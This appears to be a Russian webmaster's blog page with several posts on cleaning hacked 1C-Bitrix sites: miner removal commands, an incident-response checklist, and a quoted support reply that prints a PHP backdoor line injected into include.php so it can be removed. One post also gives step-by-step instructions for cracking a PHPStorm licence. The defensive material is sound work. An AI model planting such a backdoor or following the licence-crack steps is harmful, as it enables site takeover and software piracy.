Всем привет!

Не так давно ко мне обратились за помощью для устранения вредоносного ПО на сайте — майнера moneroocean xmrig который после удаления всегда появлялся по пути
/tmp/.tmp/moneroocean/config_background.json

Первичная уязвимость оказалась в том, что на хостинге забыли удалить сайт по умолчанию в /home/bitrix/www — в итоге установочные скрипты были доступны по IP адресу сервера, чем и воспользовались злоумышленники — разместили бэкдор /.500.php следующего содержания

В решении вопроса помог саппорт Битрикса (я почему-то сразу упёрся в анализ логов и поиск бэкдора в /ext_www/ где были расположены сайты, а про /www/ как то позабыл).

Приведу полный текст саппорта, т.к. там приведены другие возможные места размещение бэкдора (у меня там было чисто):

Добрый день!

Если ваш сервер был заражен майнером Xmrig, то рекомендации могут быть следующими.

— зайти по ssh на сервер
— посмотреть, есть ли процесс xmrig, если да, то откуда он запущен
— завершить процесс майнера xmrig
— проверить — удалить папки /home/bitrix/.system и /home/bitrix/.web, (вероятно, xmrig лежит там):

pkill -f ‘sql_backup.sql’
pkill -f ‘bitrix_sql_dump’
pkill -f ‘xmrig’
rm /tmp/xmrig
rm /home/bitrix/sql_backup.sql
rm /home/bitrix/bitrix_sql_dump
rm /home/bitrix/.web
find /home/bitrix/ -maxdepth 5 -name auth_login.php | xargs rm

— Удалить файл /home/butrix/.winds
— проверить, нет ли каких-то служб в systemctl или задач в crontab, которые вы не создавали, удалить лишнее и подозрительное
— удалить по всем сайтам файл auth_login.php (лежит, как правило, в корне и папке /bitrix/admin)
— проверить сайт через сканер троянов https://marketplace.1c-bitrix.ru/solut…rix.xscan/ (?)
— проверить содержимое файлов t.php и 404.php на предмет вредоносного кода
— удалить сайт по умолчанию в /home/bitrix/www, если он не нужен.
— проверить, нет ли в системе лишних администраторов, сменить пароли, настроить двухфакторную авторизацию (Битрикс, ssh, ftp, mysql)
— сменить ключи всех API интеграций, если таковые использовались

К сожалению, вынуждены отметить, что выполнения данных действий может быть недостаточно для полного излечения, так как на вашей установке ситуация может отличаться. Поэтому, настоятельно рекомендуем привлечь к анализу ситуации опытного системного администратора и, если есть, специалиста по безопасности.

Волею судеб попал на ветку официального форума 1С Битрикс по взлому данной системы управления сайтом — как то в давнее время несколько клиентов были взломаны, пришлось вникать в тему.
Собственно, тема актуальна и по сей день — в форум постоянно приходят новые люди с той же самой проблемой.
«Сайт на движке Битрикс взломали — что делать?»
Накидал в ветке небольшую инструкцию
https://dev.1c-bitrix.ru/community/forums/messages/forum6/topic147346/message746142/?result=edit#message746142

Продублирую и сюда, и думаю буду пополнять новыми советами, сигнатурами и т.п. В общем аккумулировать всю полезную информацию с ветки.

Итак, рекомендации при взломе сайта:

* Сделать бэкап текущего состояния сайта, скопировать логи для дальнейшего изучения

* Убедиться, что вредоносное ПО в данный момент не запущено (не находится в оперативной памяти). Бывает зараза сидит в памяти и при удалении сама себя сразу же или через некоторое время восстанавливает.

* Сменить все пароли — ssh, ftp, все админские учетные записи на сайте

* Cменить ключи всех API интеграций, если таковые использовались. Проверить доверительные SSH ключи (чтобы не было лишних), для всех пользователей.

* Удалить сайт по умолчанию в /home/bitrix/www, если он не нужен. Проверить отсутствие установочных скриптов bitrixsetup.php и restore.php

* Проверить, нет ли каких-то служб в systemctl или задач в crontab, которые вы не создавали, удалить лишнее и подозрительное

* Воспользоваться штатными средствами Проактивная защита
начать с поиска троянов /bitrix/admin/xscan_worker.php?lang=ru

* Воспользоваться сторонними средствами ( aibolit и т.п.)

* Поискать по файлам вручную (самое быстрое в консоли по ssh), довольно много сингатур публиковались в этой ветке — конкретный пост не подскажу, давненько было дело — нужно искать. Я по ним много раз находил заразу.

* Посмотреть агентов — чтобы лишних не было (если зараза в агентах, то смысла в файловой системе искать нет — всё равно будет заново создано)

* Добавить код сайта в гит (будете изменения быстро вылавливать, а так же контролировать новые файловые изменения)

* Поставить какой нибудь скриптик по отлову изменений (например, при изменении сразу письмо на электронку)

так по горячим следам гораздо проще анализировать логи (например за последние сутки)

* По логам вычислить заразу и прибить

* После чистки — режим наблюдения (скрипт изменений + гит либо просто регулярно git status в ручном режиме)

* Регулярное резервное копирование (желательно не сюда же — в облако или стороннее хранилище, при наличии гита можно бэкапить только БД)

как то так …

P.S.

Так же можно обратиться в саппорт Битрикса — есть случаи когда помогали найти и устранить уязвимость, при наличии актуального ключа поддержка осуществляется бесплатно.

Либо банально найти специалистов по взлому и безопасности и обратиться к ним, но это естественно уже не бесплатно 🙂

Позже будет отдельный пост с полезными linux командами для поиска по датам создания, содержимому, а так же известным сигнатурам для поиска.

Сначала, попробовал воспользоваться триальным месяцем для вновь созданного аккаунта — но почему-то триальные лицензий на таких аккаунтах не находились 🙁
пробовал в режиме инкогнито а так же с Tora, с аккаунтов yandex и gmail — эффект нулевой

Далее решил уже приобрести платный ключ и каждый год продлять (на 3й год сумма существенно снижается) — НО к сожалению из-за санкций к России оплатить заказ никак не получилось — даже после смены страны в настройке акканута оплата картой VISA Российских банков не проходила — PayPal у меня нет, а других вариантов оплаты на сайте не было…

Пришлось гуглить тему взлома 🙁

Идём сюда https://jetbra.in/s
выбираем «живой» сервер, заходим — там качаем архив и кликаем по иконке PHPStorm (ключ активации скопируется в буфер обмена)

Далее я некоторое время помучался, т.к. у меня Ubuntu и по инструкции не «взлетало» (пользователям Windows думаю будет попроще)

Правил вручную phpstorm64.vmoptions — ожидаемого результата не было 🙁 при вводе ключа в PHPStorm получал «key is invalid»

При запуске скрипта scripts/install.sh получал

В итоге помогло решение скопировать содержимое архива прямо в пользовательскую директорию /home/alex/
Далее запуск /home/alex/scripts/install.sh отработал корректно — ввёл скопированный ключ и получил активацию на 1 год.

Чуть подробнее о моих изысканиях:
Читать полностью »

Сегодня решил написать небольшой обзор мошеннической схемы так сказать от первого лица.
Начну с главного — мой подарочный билет в лото выиграл 187 тысяч рублей!!!
Я очень обрадовался и … собственно, решил написать данный обзорчик для рубрики «взлом и безопасность» 🙂
Кто чтению предпочитает просмотр видео — закатал ролик на ту же тему — смотрим.

Схема в принципе стандартная — мошенники хотят получить данные Вашей банковской карты с помощью фишингового сайта (в данном случае — онлайн ЛОТО), но лично я больше слышал о таком … сам не видел. Очень было интересно посмотреть, как это всё работает, вживую 🙂 И вот — мне выпал такой шанс!

Итак, сегодня утром в своём почтовом ящике я обнаружил письмо следующего содержания

Поздравляем! Мы дарим Вам один билет на юбилейный тираж с розыгрышем в 2 миллиарда рублей! Забрать билет Вы можете нажав на кнопку «ПОСМОТРЕТЬ БАЛЛЫ»

Читать полностью »

Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};


5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!

Говорят «лучшее — враг хорошего», и в этом есть смысл.

Под впечатлениями от скрипта в предыдущей статье, решил поставить «следилку» на сайты нескольким своим клиентам, и чуток разочаровался — скрипт у одного не запустился т.к. версия PHP была мягко говоря устаревшей, на мои призывы обновиться сказал «работает — не трогай» (и в этом тоже есть своя правда), у другого довольно сильно подвесил систему т.к. файловая структура составляла сотни! тысяч файлов, а режима «быстрой» проверки (только по атрибутам файла — размер, даты, режим доступа, владельцы) отсутствовал.

Собственно, пришлось сделать простенький скриптик, практически моментально сравнивающий изменения из файлов, содержащих информацию о файловой структуре сайта.
Снимать дампы можно консольно (мне так удобнее), желающие могут дописать скрипт.
Скрипт «голый» — без интерфейса, отправки на мыло изменений и других наворотов — как есть.
Пользоваться так:
ls -alR > file1.txt
ls -alR > file2.txt
fdiff.php file1.txt file2.txt > diff.txt
скрипт кидает результат в поток, в моём случае перенаправленный в diff.txt

Кого заинтересовало — качаем.

В очередной раз коснусь темы безопасности сайтов.
Не буду томить — сразу пару мыслей озвучу, в конце поста подкреплю интересными с моей точки зрения ссылочками.
Итак, мысль первая — чтобы уметь находить шеллы, бэкдоры и прочую хрень, ИМХО обязательно нужно попробовать их попрятать и наоборот — чтобы уметь прятать, нужен опыт по их нахождению!
В идеале — устроить соревнование с единомышленником 🙂
Без инструмента отслеживающего изменения файлов! — т.к. с ним всё очень просто. предположим, что момент инъекции не отслежен, у хакера (товарища) есть доступ к шеллу и снимка файловой системы до инъекции тоже нет. Задача «игры» — как можно дольше удержаться в файловой системе соперника, как можно быстрее удалить инъекции со своего сайта.
Так же при работе с чужим сайтом, помним, что главное — не спалиться. Если каким то образом помимо шелла вычисляем реальный IP атакующего, или какие то данные (имя домена, хостинг оформленные на него, и т.д. и т.п.) — полная победа 🙂 — например чтоб не светить IP можно использовать браузер для анонимного серфинга TOR Browser (в реальности такие данные могут помочь спрятать хакера за решетку).
Вторая мысль уже больше не мысль, а совет для обнаружения уже засевшего бэкдора в момент его работы — обязательно включайте логирование тела POST запроса, ну и логи COOKIE так же не помешают.
В nginx за это отвечают переменные $request_body и $http_cookie, так же у меня не логировался непосредственно хост — добаил $http_host.

Ну и анализ, анализ и ещё раз анализ логов — взять с поличным проще чем отловить иньъекцию в файловой системе (это вы поймёте ознакомившись с прикреплённым материалом — способов зашифровать инъекцию великое множество — и далеко не все ищутся антивирусами и спец.софтом) — именно поэтому много бэкдоров после успешной инъекции могут выжидать своего часа дни, недели, месяца.

Ну и как обещал, кучка интересных ссылок (там на каждом ресурсе можно ещё пошарить — инфы полезной масса).
Для начала, стоит почитать статьи от авторов известного скрипта для поиска заразы ai-bolit.php
Далее уже пошли ссылки потяжелее 🙂

https://www.nulled.cc/threads/252175/

https://forum.antichat.ru/threads/298338/

https://habrahabr.ru/post/280516/

Время от времени, а точнее когда в очередной раз натыкаюсь на ломаные сайты, публикую подобные посты а ля «вылечу Ваш сайт», проведу аудит безопасности и самое главное — установлю систему контроля на взлом Вашего сайта!
Вот и сейчас пример поломанных 4х сайтов с файловыми и php иньекциями:
Сайт www.mgrad-putilkovo.ru — инъекция Где можно купить дженерик сиалис
Сайт www.catalog-max.ru — инъекция Где можно купить таблетки виагра
Сайт pearl-zelenograd.ru — инъекция Не дорого преобрести левитра — взломщик видимо не особо грамотный попался 🙂
Сайт za-vidnoe.ru — инъекция Женская виагра купить в аптеке Москва

Как видно хакеры уже ломают с умом и с конкретной целью — монетизировать взломанный ресурс, путём продажи через партнерку фарма препаратов (если конечно дорвей долго проживёт и поймает поисковый трафик — проиндексируется и «повисит» в выдаче Яндекса некоторое время на хороших позициях).
Так же видим, что по сути прямого вреда сайту данная иньекция не наносит — информация на сайте остаётся нетронутой, но всё же я думаю вред всё таки есть — страницы генерируются доргеном, текст на таких страничках создаётся роботизированный — не имеющий смысла, подобные страницы как правило не нравятся поисковикам — и на сайт накладываются штрафные санкции понижающие его в поисковой выдаче — что может быть хуже ? (конечно кроме порчи информации)
Так что, если Ваш сайт резко начал снижаться в позициях в ТОПах — проверьте его на зараженность, если сами не умеете — обратитесь к профессионалам или например я мог бы глянуть (гораздо дешевле чем у профи).

P.S.
К сожалению на мои посты и письма никто внимание не обращает — видимо люди заводят сайты просто так, и им плевать что с ними дальше будет.